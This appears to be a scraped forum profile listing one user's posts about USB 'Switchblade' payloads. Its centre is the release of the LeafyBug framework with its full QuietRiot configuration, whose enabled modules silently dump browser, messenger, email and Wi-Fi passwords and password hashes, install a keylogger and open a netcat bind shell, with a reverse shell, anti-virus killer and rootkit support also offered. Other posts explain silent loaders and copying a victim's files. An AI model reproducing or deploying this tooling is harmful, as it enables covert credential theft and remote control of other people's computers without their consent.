twsSentinel

Active Members
  • Posts

    24
  • Joined

  • Last visited

Recent Profile Visitors

1,216 profile views

twsSentinel's Achievements

Newbie

Newbie (1/14)

  1. oh crap .. sry guys! ... I forgot to config IIS for those files. *fixed*
  2. LeafyBug has been released (Look up top at first post). Please read the update first though. Thanks guys for your support!
  3. Hey guys .. I'll release it either tomorrow, or in the next couple days. There's a couple of things I'd like to see implemented. Also, I have completely lost my U3 Drive (OMG!) sucks. I have no idea what happened to it. So I will be unable to test any U3 capabilities or create a U3 Package Installer. Hopefully I'll buy a new drive within a wk. I'm also still undecided about releasing a rootKit with the QuietRiot. The leafybug has the ability to use the hxdef RK, but I might just leave it up to the individuals to modify the HxDef rootkit. But we'll see. On another note, I'm working with the creator of PwDump v6.5 (foofus.net) to create an x64 compatible version. I will release the Lb/QuietRiot before this gets built, but hopefully an x64 version will be out soon. If you've ever tried to run it in a 64-bit environment, the application hangs. Anyways ... thanks for the support guys. Sorry for the wait!
  4. it would not be difficult to fix this though, therefore I don't see the point. I guess it could be just annoying lol
  5. hey there ... here's a U3 Dev Package ... Contains SDK, Prototyper, Manifest Creator, some other stuff... http://tws.serveftp.org/progs/U3 Dev Package (01.22.2007).zip or you can just download the SDK: http://tws.serveftp.org/progs/U3_Platform_...DK_May_2006.zip
  6. very true, but come on ... if you are going to operate a web hosting company, you have to plan for these contingencies. Unless this attacker has enough zombie machines, in the hundreds or thousands, there are ways to defend against attacks.
  7. Can they really be this bad at defending against a DDoS attack? My god, it's been like a week straight.
  8. The LeafyBug - A new advancement based off the SwitchBlade PoC.

     Update: 6.09.2007
     Well guys, I gotta say I'm sorry. The launch of the LeafyBug did not go quite as planned. I've been offered a partnership to a new startup eBusiness. So that has taken 100% of my time this past week. That and school. But I've decided to release the files. However, I did not get to finish all the features I wanted. Specifically the "Loader" application; so I have not included this in the downloads yet. Once done, the loader offers new solutions to the payload execution. First off it detects if .NET is installed on the computer; therefore, if the necessary dependencies are not found, the payload won't run. You can even specify to run a backup payload! It has a few other features to assist in run customization. Anyway, to no further wait:

     http://tws.serveftp.org/software/LeafyBug/LeafyBug.zip << Framework exe
     http://tws.serveftp.org/software/LeafyBug/...ditor.zip << Payload Editor
     http://tws.serveftp.org/software/LeafyBug/...ource.zip << C# Source code for the framework
     http://tws.serveftp.org/software/LeafyBug/...ogger.zip << Small .NET Keylogger I made which works x86 & x64. Does not use WinAPI Hooks.

     *More info on .NETLogger can be found at: http://www.codeproject.com/useritems/NetKeyLogger.asp. I've released it open-source there.

     Please guys, accept my apologies on this release. I really intended to have it 100% finished; all features. I will finish the project, but I can't really give an ETA. The LbLoader application will be released within the next week or so. Those files are being hosted directly off my pc server, so if you want to spread to RapidShare, be my guest. :)

     What is the LeafyBug?
     All this time here at Hak5.org, we've had several U3 Payloads come and go. Most of us found one we liked or created our own. However the LeafyBug brings a whole new aspect to the table. The LeafyBug is NOT a payload, it is a payload framework which allows you to extend the Switchblade's concept to a greater extent. Think of it this way, the LeafyBug is like the payload engine. The payloads themselves are only made up of 2 ini setup files. The QuietRiot v2.1.5 is the first payload for this new framework.

     ;***********************************************
     ;* QuietRiot v2.1.5 Modules
     ;* LeafyBug Payload
     ;* Date: 5/25/2007
     ;* Code: _DmG_
     ;***********************************************
     ;* *******************************************************************************************
     ;* Creating Custom Modules:
     ;*
     ;* To create a module you must specify certain variables...
     ;* =-------------------------------------------------------------------------------------------=
     ;* | Var      | Value                                                                | Required |
     ;* =-------------------------------------------------------------------------------------------=
     ;* Enabled   = Enabled or Disabled (Write 'true' or 'false')                          YES
     ;* Filename  = EXE_NAME("Name of actual exe's name")(Ex. keyLogger.exe, netstat)      YES
     ;* Mode      = (Choices either 1,2,3)                                                 YES
     ;*             1 = SystemInfo (Ex. netstat, ipconfig) Used for system executables only
     ;*             2 = Executable (The exe will be run from usb device)
     ;*             3 = Executable (The exe will be copied to target. If RootKit is enabled, it will
     ;*                 run under its protection.)
     ;* =-------------------------------------------------------------------------------------------=
     ;* FileDIR   = Path to copy exe to if 'Mode'== 2 or 3 (Default. Leave empty)          NO
     ;* PreArgs   = Custom export args (This string will be sent after the EXE_NAME &      NO
     ;*             before the output filename) Nirsoft applications generally use '/stext' to
     ;*             output into a log, but some apps require something different. See the
     ;*             "Firefox Passwords" module for an example.
     ;* PostArgs  = Custom export args                                                     NO
     ;*             If Mode == 2: This string will be sent after the output filename. Ex. See "AdapterWatch".
     ;*             If Mode == 3: Use this string to set the name for the registry key. Ex. See "KeyLogger"
     ;* x64       = x64 Flag! (If you know an app is incompatible with x64 OS, then set to "true".   NO
     ;*             The app won't run.)(Default. Leave empty or false)(See "pwdump" module as an example.)
     ;* x64File   = x64 Alternative EXE Support (If you have two executables one for x86, and x64,   NO
     ;*             you can set the EXE_NAME to the file here.
     ;*             (See "CurrentPorts" & "WifiKeys" modules as examples.)
     ;* Output    = If the application will output text, leave blank or set to true, otherwise, false.   NO
     ;*             (See "NetCat" or "Keylogger", these programs don't require the app to finish.)
     ;* =-------------------------------------------------------------------------------------------=
     ;* *******************************************************************************************
     ;PRE-CONFIGURED VARIABLES: Use these to aid in settings.
     ;
     ;$DRIVE_DIR$ » Drive the payload executes from.
     ;$MACHINE_NAME$ » Target computer's name.
     ;$SYSTEM$ » Target computer's system32 directory.
     ;$DATE$ » Date of execution.
     ;$TIME$ » Time of execution.
     ;$NC_PORT$ » Port number specified in config file.
     ;$NC_RVS_IP$ » Reverse shell IP.
     ;$NC_RVS_PORT$ » Reverse shell port.

     [Anti-Virus Killer]
     Enabled=false
     Filename=
     Mode=
     FileDir=$FILE_DIR$
     PreArgs=
     PostArgs=
     x64=
     x64File=
     Output=false

     [NetStat]
     Enabled=false
     Filename=netstat
     Mode=1
     FileDir=$FILE_DIR$
     PreArgs=-n
     PostArgs=
     x64=
     x64File=
     Output=

     [AdapterWatch]
     Enabled=true
     Filename=quietriot_awatch.exe
     Mode=2
     FileDir=$FILE_DIR$
     PreArgs=/stab
     PostArgs=1
     x64=
     x64File=
     Output=

     [CurrentPorts]
     Enabled=true
     Filename=quietriot_cports.exe
     Mode=2
     FileDir=$FILE_DIR$
     PreArgs=
     PostArgs=
     x64=true
     x64File=quietriot_cports64.exe
     Output=

     [Firefox Passwords]
     Enabled=true
     Filename=quietriot_FirePassword.exe
     Mode=2
     FileDir=$FILE_DIR$
     PreArgs=>>
     PostArgs=
     x64=
     x64File=
     Output=

     [Internet Explorer]
     Enabled=true
     Filename=quietriot_iepv.exe
     Mode=2
     FileDir=$FILE_DIR$
     PreArgs=
     PostArgs=
     x64=
     x64File=
     Output=

     [Internet Explorer History]
     Enabled=true
     Filename=quietriot_iehv.exe
     Mode=2
     FileDir=$FILE_DIR$
     PreArgs=
     PostArgs=
     x64=
     x64File=
     Output=

     [Product Keys]
     Enabled=true
     Filename=quietriot_ProduKey.exe
     Mode=2
     FileDir=$FILE_DIR$
     PreArgs=
     PostArgs=
     x64=
     x64File=
     Output=

     [Instant Messenger]
     Enabled=true
     Filename=quietriot_mspass.exe
     Mode=2
     FileDir=$FILE_DIR$
     PreArgs=
     PostArgs=
     x64=
     x64File=
     Output=

     [E-Mail Accounts]
     Enabled=true
     Filename=quietriot_mailpv.exe
     Mode=2
     FileDir=$FILE_DIR$
     PreArgs=
     PostArgs=
     x64=
     x64File=
     Output=

     [Windows Updates]
     Enabled=true
     Filename=quietriot_wul.exe
     Mode=2
     FileDir=$FILE_DIR$
     PreArgs=
     PostArgs=
     x64=
     x64File=
     Output=

     [Protected Storage]
     Enabled=true
     Filename=quietriot_pspv.exe
     Mode=2
     FileDir=$FILE_DIR$
     PreArgs=
     PostArgs=
     x64=
     x64File=
     Output=

     [WiFi Keys]
     Enabled=true
     Filename=quietriot_WirelessKeyView.exe
     Mode=2
     FileDir=$FILE_DIR$
     PreArgs=
     PostArgs=
     x64=
     x64File=quietriot_WirelessKeyView64.exe
     Output=

     [KeyLogger]
     Enabled=true
     Filename=quietriot_NetLogger.exe
     Mode=3
     FileDir=$FILE_DIR$
     PreArgs=-m hour
     PostArgs=MSKL
     x64=
     x64File=
     Output=false

     [PwDump]
     Enabled=true
     Filename=quietriot_pwdump.exe
     Mode=2
     FileDir=$FILE_DIR$
     PreArgs=>>
     PostArgs=
     x64=true
     x64File=
     Output=

     [NetCat BindShell]
     Enabled=true
     Filename=quietriot_nc.exe
     Mode=3
     FileDir=$FILE_DIR$
     PreArgs=-L -p $NC_PORT$ -d -e cmd.exe
     PostArgs=MSNCBS
     x64=
     x64File=
     Output=false

     [NetCat ReverseShell]
     Enabled=false
     Filename=quietriot_nc.exe
     Mode=3
     FileDir=$FILE_DIR$
     PreArgs=$NC_RVS_IP$ $NC_RVS_PORT$ -e cmd.exe
     PostArgs=MSNCRS
     x64=
     x64File=
     Output=false

     Oooohhh, Aaahhhhh ... What's so damn special about it?!? No more shell coding, you have the power of the .NET Framework without even coding one thing. The software is already in place ... just create 2 simple files with the LeafyBug Editor. This project is nearing completion. All code is pretty much done. Just a few more quick features to add.

     Here's why to migrate to the LeafyBug:
       • Full WinOS Compatibility and Customization - x86 & x64
       • 100% hidden running ... other payloads would show up on x64
       • LeafyBug SmartTags :: Be able to use the .NET Framework without even coding. Hardcoded SmartTags like ($MACHINE_NAME$, $DATE$) will give you current information on each run.
       • Auto-Detects system architecture, allows you to specify 32&64bit apps for each module, and automatically executes the proper one.
       • RootKit Ability
       • Easy to create, expand, simplify with no code what-so-ever. Add new modules with ease in the editor.
       • Customize each module down to a T how it will run and execute.
       • Installation is simple, place whatever you want in any drive/directory
       • U3 & Non-U3 Compliant
  9. Yep, I just did a little checking. Nakaori wrote this excellent little code. Create a file in your usb drive Ex.("usb:FILENAME.txt"). Then use the above code to look for that file and get the drive letter.

     rem Probe each drive letter for the marker file and record the letter of the drive that has it
     for %%i in (D E F G H I J K L M N O P Q R S T U V W X Y Z) do if exist %%i:\FILENAME.txt set DRIVE=%%i

     I haven't tested it though, but should work.
  10. Might be tough or not possible through shell code. Your best chance I guess would be to create a For loop iterating through each letter of the alphabet and issuing the command: "vol DRIVE_LETTER:" and check to see if the drive volume exists and what its name is. This would be quite annoying, and I'm not writing the code lol Why is your payload on the CD partition anyway?
  11. Another option would be for the switchblade app to check for that certain MS Hotfix, if it's installed, and then either run the program or not. Would not be tough to implement. Also "shutdown.exe /a" will abort the shutdown process if it's been executed.
  12. Hey there ... What you're looking for is either of two programs: PackageFactory OR U3 Package Prototyper. Both can convert software into a U3 Program. However, that being said, it's only meant for certain software. An anti-virus might be too complex to do a simple convert, but it's worth giving a shot. If you need help getting the software let me know I'll post a link.
  13. Nothing will show when the QRLoader runs. That's the point of having it 100% silent. lol It automatically executes QuietRiot.vbs via WScript.exe In order for it to work, however, the QRLoader.exe MUST be in the same folder as "QuietRiot.vbs" & "WScript.exe". If you want it in a different folder, you'll have to edit the C++ code and recompile it. But it's only a minor adjustment.
  14. Thanks for the response. The QRLoader is an exe file which executes wscript.exe (Windows Script Host 5.6) and tells the WSH to run QuietRiot.vbs (the payload). It's not a required file, but very helpful. You can use it to configure your autorun.inf and other things like the U3 installer. The QRLoader is also open source, so any c++ developers can easily write extra features in it. Something that I've been meaning to write a small article on. Thank you for the suggestion/request ... That will be added into the payload in the next version. If I have some time later tonight .. I'll code it in quickly.
  15. 1) What is the difference (for switchblade) of having U3 as opposed to not? In other words, is it easier to steal information or does it steal more information?
      > There aren't any real advantages concerning a U3-Enabled Switchblade over a regular drive. You can configure it to do the same. The only loss is the ability to run U3 Applications.
      2) What exactly does the default coding steal and how do you edit/manipulate this to steal other things?
      > As for myself, I've only used custom payloads and then now designed my own. (Quiet-Riot) They all offer many similar options, however, some are more equipped than others.
      3) How would I create a USB that automatically and silently copies all files from, say, the My Document folder?
      > Well if you're writing the payload in shell script, then you'll want to execute "%COMSPEC% copy %userprofile%My Documents FLASH_DRIVE_FOLDER" or something like that. Search google to learn shell scripting.